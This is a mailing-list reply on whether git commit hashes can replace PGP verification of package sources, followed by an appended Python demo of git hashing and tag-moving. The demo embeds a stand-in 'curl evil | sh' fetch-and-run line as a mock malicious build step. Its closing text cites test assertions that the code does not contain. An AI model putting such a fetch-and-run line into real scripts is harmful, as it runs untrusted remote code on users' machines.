On 12/08/2016 09:45 AM, Travis Burtrum wrote:
> For a #commit=hash you shouldn't have to verify anything, since git itself guarantees that the code under a specific commit hash cannot change.
> Everything else can change, including tags, so those are suitable for pgp verification.
Well, that would be just as good as having checksums, which is certainly something. But it is also completely missing the fundamental point of "PGP" verification.

...

If users want to assume the maintainer has already checked the PGP signatures for proof of authorship, and simply rely on the checksums being accurate, they can use --skippgpcheck. Personally, I will continue on with checking pgp signatures...

I don't see why signed git commits should be different from files with sha256sums in that respect.

-- 
Eli Schwartz
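The two positions above rest on a mechanical fact about git that is worth seeing in code: a commit hash is a content hash of the tree it names, so pinning `#commit=<hash>` pins bytes, while a tag is only a ref (a name pointing at a hash) that upstream can move with `git tag -f` and a forced push. The following Python is an added example, not part of this thread and not makepkg's code; it re-implements git's blob/tree/commit object hashing with `hashlib` so it runs offline, and the file contents, the author/committer identity string, the repository URL and the ref table are constructed for the illustration. Note what it does not show: a matching hash proves the bytes are unchanged, not who produced them, which is the gap a PGP signature on the tag or commit is meant to close.

```python
"""Added example: a git commit hash pins content, a tag does not.

Re-implements git's object hashing so the demonstration runs offline.
Identity string, file contents, URL and ref table below are constructed.
"""
import hashlib


def git_object_id(kind: str, payload: bytes) -> str:
    """Id git assigns an object: sha1(b"<type> <size>\\0" + payload)."""
    header = f"{kind} {len(payload)}\0".encode()
    return hashlib.sha1(header + payload).hexdigest()


def blob_id(data: bytes) -> str:
    """Same value `git hash-object` prints for a file holding these bytes."""
    return git_object_id("blob", data)


def tree_id(entries) -> str:
    """entries: iterable of (mode, name, hex_oid) for a flat directory.

    Git stores '<mode> <name>\\0<20 raw sha bytes>' per entry, sorted by
    name (subdirectories sort as name + '/', not needed for a flat tree).
    """
    body = b""
    for mode, name, oid in sorted(entries, key=lambda e: e[1]):
        body += f"{mode} {name}".encode() + b"\0" + bytes.fromhex(oid)
    return git_object_id("tree", body)


def commit_id(tree: str, parents, ident: str, message: str) -> str:
    """Hash a commit object; `ident` is a 'Name <mail> epoch tz' line."""
    lines = [f"tree {tree}"]
    lines += [f"parent {p}" for p in parents]
    lines += [f"author {ident}", f"committer {ident}", "", message]
    return git_object_id("commit", ("\n".join(lines) + "\n").encode())


# Constructed identity; a real repo would carry the real author/committer.
IDENT = "Example Dev <dev@example.invalid> 1481211900 +0000"
URL = "git+https://example.invalid/pkg.git"  # constructed


def build_commit(script: bytes) -> str:
    """Commit a one-file tree; any changed byte in the file changes the id."""
    tree = tree_id([("100644", "build.sh", blob_id(script))])
    return commit_id(tree, [], IDENT, "release 1.0")


def resolve(refs: dict, source: str) -> str:
    """Resolve a PKGBUILD-style source fragment to the commit it yields.

    '#commit=<hex>' is the pin itself; '#tag=<name>' goes through the ref
    table, which is exactly the part upstream can rewrite.
    """
    kind, value = source.split("#", 1)[1].split("=", 1)
    if kind == "commit":
        return value
    if kind == "tag":
        return refs[f"refs/tags/{value}"]
    raise ValueError(f"unsupported fragment: {kind}")


def retag_demo() -> dict:
    """Upstream (or anyone with push rights) force-moves tag v1.0."""
    good = build_commit(b"#!/bin/sh\nmake install\n")
    evil = build_commit(b"#!/bin/sh\nmake install\ncurl evil | sh\n")
    refs = {"refs/tags/v1.0": good}
    out = {
        "good": good,
        "evil": evil,
        "tag_before": resolve(refs, f"{URL}#tag=v1.0"),
        "hash_before": resolve(refs, f"{URL}#commit={good}"),
    }
    refs["refs/tags/v1.0"] = evil  # git tag -f v1.0 <evil>; git push -f --tags
    out["tag_after"] = resolve(refs, f"{URL}#tag=v1.0")
    out["hash_after"] = resolve(refs, f"{URL}#commit={good}")
    # Neither value says who wrote `good`; that is what a signature adds.
    return out


if __name__ == "__main__":
    for k, v in retag_demo().items():
        print(f"{k:12} {v}")
```

The three fixed ids asserted in the test (empty blob, the blob for `hello\n`, and the empty tree) are the well-known values `git hash-object` and `git write-tree` produce, which is the quick way to check the re-implementation against a real git binary.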